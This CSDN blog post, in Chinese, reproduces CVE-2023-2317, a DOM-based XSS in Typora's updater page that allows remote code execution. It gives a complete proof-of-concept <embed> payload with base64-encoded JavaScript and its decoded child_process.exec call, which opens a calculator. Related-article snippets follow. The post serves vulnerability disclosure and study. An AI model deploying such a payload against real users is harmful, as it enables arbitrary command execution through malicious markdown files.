Typora DOM-Based远程命令执行

已于 2023-08-29 11:30:01 修改
阅读量114 收藏
点赞数
文章标签: web安全
于 2023-08-29 11:25:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50815573/article/details/132557763
版权

漏洞简介
Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XSS允许特制的markdown文件通过加载在Typora主窗口的上下文中运行任意JavaScript代码typora://app/typemark/updater/update.html在<embed>标记中。如果用户在Typora中打开恶意降价文件,或者从恶意网页复制文本并将其粘贴到Typora,则可以利用此漏洞。

<embed src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fοnlοad=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]"></embed>


base64加密部分

reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

原文章:(CVE-2023-2317) Typora DOM-Based Cross-site Scripting leading to Remote Code Execution | STAR Labs

圆圆喜欢方方
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dom-to-image.js
07-27
一开始使用的是html2canvas.js。功能是可以实现,但是有缺陷(表格存在合并的单元格时,生成的图片表格线框不完整),后来很不容易知道了dom-to-image.js,尝试之后觉得非常不错
vue-dom-hints:Vue devtool,用于在DOM中标识Vue组件及其SFC路径
05-01
:rocket: 安装npm i vue-dom-hints :vertical_traffic_light: 设置将其作为安装到Vue: import DomHints from 'vue-dom-hints'Vue . use ( DomHints ) 在构建中将其禁用以进行生产: if ( process . env . NODE_ENV...
Typora 远程代码执行漏洞(CVE-2023-2317)
qq_42751192的博客
08-29 1236
Typora 是一款由 Abner Lee 开发的轻量级 Markdown 编辑器,与其他 Markdown 编辑器不同的是,Typora 没有采用源代码和预览双栏显示的方式,而是采用所见即所得的编辑方式,实现了即时预览的功能,但也可切换至源代码编辑模式。
Typora DOM-Based 远程命令执行漏洞
qq_18193739的博客
08-28 137
Windows和Linux版本1.6.7之前的Typora中updater/update.html中基于DOM的XSS允许特制的markdown文件通过加载在Typora主窗口的上下文中运行任意JavaScript代码在<embed>标记中。如果用户在Typora中打开恶意降价文件,或者从恶意网页复制文本并将其粘贴到Typora,则可以利用此漏洞。
Typora-远程命令执行漏洞复现-CVE-2023-2317
apple_52661176的博客
08-31 275
Typora 是一款支持实时预览的 Markdown 文本编辑器。Windows和Linux版本存在一个安全漏洞,具体表现为在updater/update.html中存在DOM-based XSS漏洞。这个漏洞的危害是允许攻击者通过加载精心制作的markdown文件,来执行恶意的JavaScript代码。如果用户在Typora中打开了这个恶意markdown文件,或者从一个恶意网页复制文本并将其粘贴到Typora中,那么攻击者可以通过在<embed>标签中引用update.html来利用这个漏洞。
dom-align:灵活地对齐DOM节点
04-29
截屏安装特征支持IE9 + Chrome Firefox浏览器支持对齐点和偏移支持根据可见区域自动调整在线演示用法import domAlign from 'dom-align' ;// use domAlign// sourceNode's initial style should be position:absolute...
jest-environment-jsdom-sixteen
04-28
如果您需要比Jest随附的JSDOM更新的JSDOM,请使用npm install --save-dev jest-environment-jsdom-sixteen或yarn add jest-environment-jsdom-sixteen --dev来安装此软件包,然后编辑Jest像这样的配置: { " test...
dom-to-to-retina视网膜:dom-to-to-retina,但生成高分辨率图像
03-04
用法import { toPng , toJpeg , toBlob } from "dom-to-image-retina"const dataUrl = await toPng ( el , options )const dataUrl = await toJpeg ( el , options )const blob = await toBlob ( el , options )执照...
网络安全和信息安全
waitaikong_的博客
06-12 634
信息安全、网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全、网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全和网络安全的内容,还延伸到了更广泛的社会和法律层面。
网络安全攻防演练:提升应急响应能力
weixin_64392888的博客
06-14 684
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。
国内外网络安全现状分析
waitaikong_的博客
06-10 577
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
网络安全:什么是SQL注入
浪里个狼游记
06-17 396
在数字化时代,数据安全成为了企业和个人最关心的问题之一。SQL注入(SQL Injection)是网络安全领域中最常见也是最危险的攻击手段之一。本文将深入探讨SQL注入的概念、工作原理以及它如何成为一个严重的威胁。SQL注入是一种代码注入技术,攻击者通过在Web表单输入或者URL查询字符串中输入恶意SQL代码,利用应用程序后端数据库的安全漏洞,从而执行非法的数据库操作。这些操作可能包括但不限于数据泄露、数据删除、数据篡改和身份冒用。
提升网络安全韧性:从基础防护开始
Dexun_chuqi的博客
06-13 628
网络安全韧性(Cyber Resilience)指的是在面对网络攻击或其他不利事件时,系统、网络和组织能够有效抵御、吸收和恢复正常功能的能力。这一概念不仅关注防止攻击的发生,还强调在攻击发生后,系统能够迅速恢复并继续运行。网络安全韧性包括预防、响应、恢复三个主要环节,旨在确保在面对各种潜在威胁时,网络能够保持其关键功能。提升网络安全韧性是一项系统性工程,涉及多个方面的综合管理和技术手段。
网络安全(补充)
m0_62207482的博客
06-14 969
清除攻击痕迹:避免安全管理员的发现、追踪以及法律部门取证 隐藏技术:连接隐藏(冒充其他用户、修改LOGNAME环境变量、修改utmp日志文件、使用IP SPOOF技术等)、进程隐藏(使用重定向技术减少ps给出的信息量,用特洛伊木马带皮ps程序等)、文件隐藏(利用字符串相似麻痹系统管理员,或修改文件属性使得普通显示方法无法看到、利用操作系统可加载模块特性,隐瞒攻击时所产生的信息) 完全连接扫描利用TCP/IP协议的三次握手连接机制,使源主机和目的主机的某个端口建立一次完整的链接。如果连接成功,则表明该端口
web安全-前端层面
保持学习,时刻复盘
06-11 1476
跨站脚本攻击(Cross-Site Scripting, 简称XSS)当用户将恶意代码注入网页时,其他用户在浏览网页时就会受到影响攻击主要方向主要用于盗取cookie凭据,钓鱼攻击,流量指向等CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。
【网络文明】关注网络安全
Liang_z_的博客
06-12 703
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
咖啡店管理系统 (Java 版) 源代码+使用说明+可做毕设
最新发布
06-17
咖啡店管理系统 (Java 版) 源代码 项目简介 这个 Java 项目是一个简单的商店管理系统。该系统处理任何咖啡酒店的业务细节。要制作这个项目,你需要 JetBrains IntelliJ IDE。这个 IDE 将为项目提供设置。你还需要 PostgreSQL 作为数据库。设计简单且用户友好。 系统介绍 关于 Java 版咖啡店管理系统,该系统处理酒店用户的管理。在使用系统之前,你需要先注册然后登录系统。从那里你可以管理你的工作空间,你可以添加客户,管理销售并进行更新。 设计非常简单,用户在操作时不会遇到困难。该项目易于操作和理解。要运行此项目,你必须在电脑上安装 Eclipse IDE 或 JetBrains IntelliJ IDE。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
dom-to-image使用方法
12-28
dom-to-image是一个用于将DOM元素转换为图像的JavaScript库。以下是dom-to-image的使用方法示例: 1. 首先,确保已经安装了dom-to-image库。可以使用npm进行安装: ```shell npm install dom-to-image ``` 2. 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值